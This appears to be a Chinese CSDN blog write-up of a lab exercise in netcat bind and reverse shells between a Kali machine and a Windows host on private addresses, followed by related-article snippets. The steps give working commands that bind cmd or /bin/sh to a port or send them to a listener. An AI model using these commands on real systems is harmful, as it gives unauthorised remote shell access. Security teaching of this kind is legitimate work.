正反向连接&反弹shell

最新推荐文章于 2024-05-17 16:41:20 发布
最新推荐文章于 2024-05-17 16:41:20 发布
阅读量406 收藏
点赞数
分类专栏: 反弹shell 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/alunxzhou/article/details/129815668
版权

实验环境

kali攻击机:ip——192.168.91.128

win物理机: phpstudy搭建环境 ip——192.168.2.192

实验目的

采用正反向连接,尝试用kali连接windows,并且反弹shell。

实验步骤

1.开启kali的22端口

(104条消息) 如何在kali系统打开22端口_kali开启22端口_小星唷的博客-CSDN博客icon-default.png?t=N2N8https://blog.csdn.net/weixin_43635067/article/details/128275833

2.xshell连接kali

3.将nc.exe传入phpstudy搭建的目录。

文件上传下载-解决无图形化&解决数据传输

nc.exe在127.0.0.1:80端口搭建的根目录中,现将nc.exe传入127.0.01:8080搭建的根目录中

棱角社区生成命令并传入

 

4.正向连接:本地监听等待对方连接

Linux控制Windows

//绑定CMD到本地5566端口

Windows:nc.exe -e cmd -lvp 5566

//主动连接目标5566

kali:nc 192.168.2.192 5566

Windows控制Linux

//绑定SH到本地5566端口

kali:nc -e /bin/sh -lvp 5566

//主动连接目标5566

windows:nc.exe 192.168.91.128 5566

 

5.反向连接:主动给出去,对方监听

Windows控制Linux

//绑定sh到目标5566端口

kali:nc -e /bin/sh 192.168.2.192 5566

//等待5566连接

Windows:nc -lvvp 5566

Linux控制Windows

//绑定CMD到目标5566端口

Windows:nc -e cmd 192.168.91.128 5566

//等待5566连接

kali:nc -lvvp 5566

 

 

 

alunxzhou
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
正反向代理与端口转发技术详解.pptx
09-03
正反向代理与端口转发技术详解,为配套的视频做的PPT,此处仅做参考。
洛匈棱镜正反向特性matlab仿真
01-14
主要有洛匈棱镜正反向分束角差异的matlab演示、反向使用时的锥光干涉效应仿真以及展示的GUI
Linux反弹shell正向连接
PP Jun的博客
10-02 648
Linux反弹shell正向连接 正向连接:使用ssh命令是主机主动连接受目标机,通过这个连接本机可以主动的向目标机发送一些请求,这称为正向连接。(主机在内网,目标机器在外网) 反向连接:指目标机主动连接主机,通过这个目标机可以主动向主机发送一些请求。(主机在外网,目标机在内网) 此次实验中:CentOS为主机,Min为目标机 First of all,将两台虚拟机设置为仅主机模式 查看CentOS的IP Cent0S的IP为:192.168.79.128 将Min配置网络 Min的IP为:192
常用反弹 shell 方式总结
未完成的歌~的博客
03-07 4952
反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。
六、Kali Linux 2 远程控制
m0_55313512的博客
02-20 3328
Kali Linux 网络渗透测试
Kali [Metasploit(MSF)] 渗透测试框架
weixin_45253622的博客
03-07 4411
Metasploit(MSF) Metasploit MetasploitMetasploit是一款开源的安全漏洞检测工具。 由于Metasploit是免费的工具,因此安全工作人员常用Metasploit工具来检测系统的安全性。 常用payload windows/meterpreter/bind_tcp #正向连接 windows/meterpreter/reverse_tcp #反向连接,常用 windows/meterpreter/reverse_http #通过监听80端口反向
linux反向ssh实例
zhongcaogen的专栏
12-17 489
反向SSH隧道依赖于使用已建立连接的远程计算机来侦听来自本地计算机的新连接请求。远程计算机在本地计算机上的网络端口上侦听。 如果它检测到对该端口的SSH请求,则会通过已建立的连接将该连接请求中继回自身。 有了这个功能,我们可以到达内网的ssh接口,而不需要使用VPN隧道。
SSH正向连接反向连接
icylling的专栏
04-27 6198
ssh -L sourcePort:forwardToHost:onPort connectToHost 意思:连接主机connectToHost,监听本地的端口sorcePort,通过主机connectToHost,把到本地端口sorcePort的连接转发到主机forwardToHost的端口onPort。 图中的两个例子: your host是敲命令的主机。 ssh -L 123:local...
反弹shell正向连接反向连接
qq_44833342的博客
05-29 346
攻击者通过该连接获得对目标计算机的控制权。在正向连接中,攻击者需要知道目标计算机的IP地址和端口号,通过这些信息建立连接。而在反向连接中,目标计算机会向攻击者的计算机发起连接请求,攻击者只需要监听该请求即可建立连接。因此,反弹shell反向连接更难被防御和检测,也更容易在网络中隐藏攻击者的身份。反弹shell是一种攻击技术,可以在未经授权的情况下远程控制目标计算机。正向连接是攻击者与目标计算机之间建立的连接反向连接是目标计算机与攻击者之间建立的连接,攻击者通过该连接发送命令来控制目标计算机。
Linux-SSH反向连接(内网穿透,打洞)
张氏小毛驴的博客
08-18 1504
另一种就是SSH反向连接,就是内网是可以访问到外网的,那么内网主机先主动连接外网主机,这样一来就建立了连接,然后外网主机就可以ssh登录到内网主机了,这就是所谓的反向连接。对于外网来说,公司内部的是内网,中间隔了个防火墙,如果想从外网去访问公司内部网络,正常情况下是不可行的,也无法做到端口转发(除非在公司防火墙上打个洞),一般场景有外网访问公司内网,外网访问学校的内网。前面说过这种反向连接不稳定,可能随时会断开,这时候又得重复上面步骤去打通,而当你无法登陆上内网主机去操作以上的步骤时候,那就没法玩了。...
DNS正反向域名解析实例
10-25
DNS正反向域名解析实例
CGCS2000高斯投影正反
08-24
CGCS2000坐标系高斯投影正反算,基于文件操作,批量处理,精度0.0001。软件基础框架来自氧气女神。
Kali Linux 鼠标双指滚动正向/反向调整
weixin_30257433的博客
06-25 675
1 进入点击设置 2 Mouse & Touchpad 3 右边自然滚动关闭即是正向,对应的打开就是反向 以后连接鼠标如果产生反转也是在这个界面,会多出一个鼠标项目,在里面开关鼠标的这个选项就可以了 转载于:https://www.cnblogs.com/WaterGe/p/11080526.html...
shell正向反向
qq_46258964的博客
02-05 8252
正向shell反向shell 正向shell:控制端主动发起连接连接被控制端 反向shell:被控制端主动连接控制端 在实战中,大多数采用反向shell,因为正向shell有很多因素导致连接失败, 比如说硬件设备有防火墙,入侵防御系统等,还有网站防火墙,端口占用,权限不足等场景,特别是硬件设备如果你正向连接被防火墙拦截导致打草惊蛇,后期攻击相当繁琐。 反向shell:而被控制端主动向外发送的数据包通常都不会被拦截。 反向shell如下 Linux常见反向shell bash反弹shell nc -lvp
netcat瑞士军刀(正向shell反向shell
逍遥小哥的博客
12-04 234
不管是正向shell还是反向shell 它们都是由被控制端将命令行输入和输入通过tcp/udp端口,发送到控制端,只是正向shell是由控制端主动发起连接的,而反弹shell是被控制端主动发起连接的。原理:被控端将cmd.exe重定向到控制端的6666端口,控制端只需要监听本地的6666端口,被控端主动连接控制端,即可获得shell。原理:被控端将cmd重定向到本地1111端口,控制端主动连接到被控制端的1111端口,即获得shell反向shell(有安全设备防护,控制端无法主动连接被控制端。
Linux常用的反弹shell命令
m0_63200360的博客
04-24 2343
什么是反弹shell反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。为什么要反弹shell?通常用于被控端因防火墙受限、权限不足、端口被占用等情形。举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接
正向shell反弹shell
weixin_45936149的博客
03-26 9039
正向shell反弹shell的利用场景以及使用技巧
简单的渗透(远程反向控制)——kali linux操控Android系统
m0_56451748的博客
11-23 3105
简单的远程反向控制
linux---进程通信
最新发布
m0_74979625的博客
05-17 661
提示:以下是本篇文章正文内容,下面案例可供参考。
nginx正反向代理
11-30
下面是nginx正反向代理的介绍和示例: 1. 正向代理 正向代理是代理客户端,客户端向代理服务器发送请求,代理服务器再将请求发送给目标服务器,目标服务器将响应发送给代理服务器,代理服务器再将响应发送给客户端...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

alunxzhou

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值